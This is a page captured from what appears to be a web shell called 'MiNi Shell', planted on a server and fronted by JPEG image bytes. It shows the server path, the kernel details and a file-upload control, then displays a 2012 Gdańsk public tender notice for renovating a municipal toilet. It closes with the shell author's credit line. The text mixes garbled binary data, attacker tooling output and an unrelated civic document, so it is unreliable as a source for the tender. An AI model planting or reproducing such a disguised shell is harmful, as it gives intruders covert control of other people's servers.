JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120208/38440-N-2012.html

<p class="kh_header"><b>Gdańsk: wykonanie robót  remontowych szaletu miejskiego przy ul. Teatralnej 2 w Gdańsku</b><br>
<b>Numer ogłoszenia: 38440 - 2012; data zamieszczenia: 08.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót  remontowych szaletu miejskiego przy ul. Teatralnej 2 w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót remontowych szaletu miejskiego przy ul. Teatralnej 2 w Gdańsku. <br>
2.	Zakres robót obejmuje:<br>

a)	roboty rozbiórkowe:
<br>
- rozbiórka ścianek działowych, <br>

- demontaż stolarki drzwiowej,<br>
 
- skucie części tynków wewnętrznych i okładzin z glazury,<br>
 
- rozebranie posadzek z płytek ceramicznych,<br>
 
- demontaż stropu parteru,<br>
 
- demontaż świetlików dachowych z luksferów,
<br>
- demontaż pokrycia dachowego z papy termozgrzewalnej,<br>

- demontaż warstw dachowych z żużlu paleniskowego,<br>

- rozebranie nawierzchni z kostki granitowej,<br>
 
- wykonanie wykopu w celu wykonania izolacji pionowej,<br>

b)	roboty betonowe i żelbetowe:  <br>

- wykonanie stropu w poziomie posadzki,<br>

c)	roboty murarskie:<br>
 
- wymurowanie nowych ścianek działowych,<br>
 
- wykonanie nowych nadproży drzwiowych,<br>

d)	roboty montażowe: <br>

- montaż ścianek działowych systemowych płyt HPL,<br>

- wykonanie okładzin i obudów instalacji z płyt GKFI na ruszcie stalowym,<br>

- wykonanie izolacji p-wilgoc. na ścianach i posadzce,
<br>
- montaż stolarki drzwiowej i okiennej drewnianej, <br>

- montaż akcesoriów łazienkowych,<br>

e)	wykonanie izolacji pionowej,<br>

f)	roboty instalacyjne: wod-kan, c.o., wentylacji mechanicznej i elektryczne,<br>

g)	roboty wykończeniowe: tynkarskie, malarskie, posadzkarskie, okładzinowe,<br>

h)	roboty porządkowe.<br>

3.	Szczegółowy opis przedmiotu zamówienia stanowią:<br>

3.1.	Projekt budowlany - wykonawczy. Projekt przebudowy szaletu. Szalet Miejski Gdańsk ul. Teatralna dz.237 obręb 089 - załącznik nr 1 do siwz;<br>

      -	decyzje Pomorskiego Wojewódzkiego Konserwatora Zabytków ZN.4151/1897/2011 z dnia 	22.07.2011 i  ZN. 4151/1897-2/2011 z dnia 02.11.2011 r.,<br>

      -  decyzja nr ZDiZ-Ua-6405-1(2)-2011-RG na zajęcie pasa drogowego,<br>
1)	architektura:załącznik nr 1.1 do siwz :<br>

a) opis techniczny,<br>

b) informacja dotycząca bezpieczeństwa i ochrony zdrowia,<br>

c) rysunki:
<br>
- Rys. nr 1 Plan sytuacyjny - załącznik nr 1.1.1 do siwz,<br>

Inwentaryzacja:<br>

- Rys. nr 2  Rzut przyziemia - załącznik nr 1.1.2 do siwz,<br>

- Rys. nr 3  Rzut dachu - załącznik nr 1.1.3 do siwz,<br>

- Rys. nr 4  Przekrój A-A - załącznik nr 1.1.4 do siwz,<br>

- Rys. nr 5  Przekrój B-B - załącznik nr 1.1.5 do siwz,<br>

- Rys. nr 6  Elewacja frontowa - załącznik nr 1.1.6 do siwz,<br>

Projekt budowlano - wykonawczy:<br>

- Rys. nr 7  Rzut przyziemia - plan rozbiórek - załącznik nr 1.1.7 do siwz,<br>

- Rys.  nr 8 Rzut przyziemia - roboty budowlane - załącznik nr 1.1.8 do siwz,<br>

- Rys. nr  9 Rzut dachu - załącznik nr 1.1.9 do siwz,<br>

- Rys . nr 10 Sufit podwieszany - załącznik nr 1.1.10 do siwz,<br>

- Rys. nr 11 Przekrój A-A - załącznik nr 1.1.11 dp siwz,<br>

- Rys. nr 12 Przekrój B-B - załącznik nr 1.1.12 do siwz,<br>

- Rys. nr 13 Elewacja frontowa - załącznik nr 1.1.13 do siwz,<br>

- Rys. nr  14 Zestawienie drzwi i okien - załącznik nr 1.1.14 do siwz,<br>

- Rys.  nr 15 Ścianki działowe z HPL - załącznik nr 1.1.15 do siwz,<br>

- Rys. nr 16 Wykończenie ścian - załącznik nr 1.1.16 do siwz,<br>

- Rys. nr 17 Wykończenie ścian - kolorystyka - załącznik nr 1.1.17 do siwz.<br>

2)	Program prac konserwatorskich. Orzeczenie techniczne. Projekt konstrukcyjny - załącznik nr 1.2.do siwz:<br>

a)	Program prac konserwatorskich, <br>

b)	Orzeczenie techniczne,<br>

c)	Projekt konstrukcyjny,<br>

d)	Obliczenia statyczne,<br>

e)	Rysunki:<br>

- Rys. nr  K-1  Rzut stropu - załącznik nr 1.2.1 do siwz,
<br>
- Rys. nr  K-2  Zbrojenie płyty - załącznik nr 1.2.2 do siwz.<br>

3)	Instalacje elektryczne  - załącznik nr 1.3 do siwz:<br>

a)	opis techniczny,<br>

b)	rysunki:
<br>
- Rys. nr  E-01(strony od 1 do 3) Schemat główny tablicy RG - załącznik nr 1.3.1 do siwz,<br>

- Rys. nr  E-02 Widok rozdzielnicy RG - załącznik nr 1.3.2 do siwz,<br>

- Rys. nr  E-03 Plan instalacji elektrycznych - załącznik nr 1.3.3 do siwz,<br>

- Rys. nr  E-04 Plan instalacji oświetlenia - załącznik nr 1.3.4 do siwz.<br>

4)	Instalacje sanitarne  - projekt przebudowy szaletu - instalacja wod-kan, co., wentylacji 	mechanicznej.  Szalet miejski Gdańsk ul. Teatralna 2 dz.237 obręb 089 -  załącznik nr 1.4 do siwz:<br>

a)	opis techniczny,<br>

b)	rysunki:<br>

- Rys. nr S - 1 Projekt  kanalizacji sanitarnej. Rzut podpiwniczenia - załącznik nr 1.4.1 do siwz,<br>

- Rys. nr S - 2 Projekt  kanalizacji sanitarnej. Rzut przyziemia - załącznik nr 1.4.2 do siwz,<br>

- Rys. nr S - 3 Rozwinięcie instalacji kanalizacji sanitarnej - załącznik nr 1.4.3 do siwz,<br>

- Rys. nr S - 4 Projekt  kanalizacji wodociągowej. Rzut podpiwniczenia - załącznik nr 1.4.4 do siwz,<br>

-Rys. nr S - 5 Projekt  kanalizacji wodociągowej. Rzut przyziemia - załącznik nr 1.4.5 do siwz,<br>

- Rys. nr S - 6 Schemat instalacji wodociągowych - załącznik nr 1.4.6 do siwz,<br>

- Rys. nr S - 7 Projekt   instalacji c.o. Rzut podpiwniczenia- załącznik nr 1.4.7 do siwz,<br>

-Rys. nr S - 8 Projekt  instalacji c.o. Rzut przyziemia- załącznik nr 1.4.8 do siwz,
<br>
- Rys. nr S - 9 Schemat instalacji c.o. - załącznik nr 1.4.9 do siwz,<br>

- Rys. nr W  1 Rzut przyziemia - załącznik nr 1.4.10 do siwz,<br>

- Rys. nr W  2 Rzut dachu - załącznik nr 1.4.11 do siwz,<br>

- Rys. nr W  3 Przekrój A-A - wentylacja mechaniczna - załącznik nr 1.4.12 do siwz,<br>

- Rys. nr W  4 Przekrój B-B - wentylacja mechaniczna - załącznik nr 1.4.13 do siwz,<br>

5) Specyfikacja techniczna wykonania i odbioru robót. Roboty  budowlane -  załącznik nr 2 do siwz.<br>

6) Specyfikacja techniczna wykonania i odbioru robót. Roboty instalacji elektrycznych -  załącznik nr 3 do siwz.<br>

7) Specyfikacja techniczna wykonania i odbioru robót. Roboty  Instalacyjne. Wentylacja mechaniczna -załącznik nr 4 do siwz.<br>

8) Specyfikacja techniczna wykonania i odbioru robót. Roboty  instalacyjne. Instalacja c.o., wodociągowa i kanalizacyjna -  załącznik nr 5 do siwz.<br>

9) Przedmiar robót - przebudowa szaletu ogólnodostępnego (roboty ogólnobudowlane) Gdańsk ul.Teatralna  2 - załącznik nr 6 do siwz.<br>

10) Przedmiar robót - przebudowa szaletu miejskiego- instalacje elektryczne Gdańsk ul. Teatralna  2 - załącznik nr 7 do siwz.<br>

11) Przedmiar robót - przebudowa szaletu miejskiego. Gdańsk ul. Teatralna  2. Instalacje wodno-kanalizacyjne oraz centralnego ogrzewania - załącznik nr 8 do siwz.<br>

12) Przedmiar robót - przebudowa szaletu Gdańsk ul. Teatralna  2. Instalacja wentylacji - załącznik nr 9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-8, 45.26.23.11-4, 45.26.23.50-9, 45.26.23.10-7, 45.26.25.00-6, 45.41.00.00-4, 45.26.00.00-7, 45.43.00.00-0, 45.44.21.00-8, 45.26.00.00-7, 45.42.10.00-4, 45.23.24.60-4, 45.30.00.00-0, 45.33.00.00-9, 45.33.10.00-6, 45.31.53.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> OFERTA MUSI BYĆ ZABEZPIECZONA WADIUM W WYSOKOŚCI: 6 000,00 ZŁ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum  - 2 roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) budynków lub wykonania pod klucz nowych budynków o wartości nie mniejszej niż 200 000,00 zł każda, obejmujące roboty ogólnobudowlane, sanitarne, elektryczne i  wentylacyjne.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Powyższe zobowiązanie musi być złożone w formie oryginału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie: <br>
- 1 osobą do prowadzenia robót budowlanych przy zabytku  wpisanym do rejestru zabytków posiadającą przygotowanie zawodowe określone przepisami ustawy  z dnia 7 lipca 1994 Prawo Budowlane (tekst jednolity Dz.U. z 2010 r. Nr. 243, poz 1623, z póź. zm.) tj. upoważniające do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie wszelkich budynków i budowli o powszechnie znanych rozwiązaniach konstrukcyjnych  i przynależącą do Izby Inżynierów Budownictwa i która odbyła co najmniej 2 letnią praktykę zawodową na budowie przy zabytkach nieruchomych,  zgodnie z § 24  ust 1 i 2  Rozporządzenia Ministra Kultury i Dziedzictwa  Narodowego z dnia 27 lipca 2011 r.  w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań  architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków  oraz badań archeologicznych (Dz.U. Nr 165 poz. 987),<br>
- 1 osobą posiadającą odpowiednie kwalifikacje w specjalności archeologia zgodnie z Rozporządzaniem Ministra kultury z dn. 27.07.2011 r.  § 26 ust. 1 i 2 stanowi, że badania archeologiczne mogą być prowadzone przez osoby, które posiadają tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku archeologia oraz odbyły po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie tych badań,<br>
 - 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji  technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń  wodociągowych, kanalizacyjnych i klimatyzacyjno - wentylacyjnych  oraz  przynależącej do Izby Inżynierów Budownictwa.<br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych oraz przynależącej do Izby Inżynierów Budownictwa, <br>
- 1 osobą posiadającej uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie montażu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1. Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania  kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr  89 poz. 828 z późn.zm.).<br>
Wyżej wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji do 1 kV.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia. Powyższe zobowiązanie musi być złożone w formie oryginału.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego. <br>
2.	Wskazać w złożonej ofercie części zamówienia, których wykonanie powierzy podwykonawcom. W przypadku nie wskazania części zamówienia, które mają być realizowane przez podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>

3.	Udzielić rękojmi za wady na okres 3 lat,<br>

4.	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 12 SIWZ.<br>

5.	Złożyć  Kosztorysy ofertowe  (uproszczone), wg przedmiarów robót Zamawiającego.<br>

6.	Złożyć Zbiorcze zestawienie materiałów wraz z przyjętymi cenami. Brak zestawienia spowoduje odrzucenie oferty.<br>

7.	Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. Cena brutto - 49,20 PLN. <br>
Warunki i sposób płatności: gotówka, przelew, zaliczenie pocztowe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2012 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 23.03.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT  23.02.2012 r. godzina 10:15, <br> miejsce w siedzibie zamawiającego 80-171 Gdańsk, ul. Cygańska Góra 1  - świetlica pokój nr 6<br> 


OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI <br> 
Grażyna Pietrowska: stanowisko służbowe -specjalista ds. zamówień publicznych,<br> 
 80-171 Gdańsk, ul. Cygańska Góra nr 1  pok. 11, <br> 
tel. 58 320 02 20 Adres poczty elektronicznej: pietrowska@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com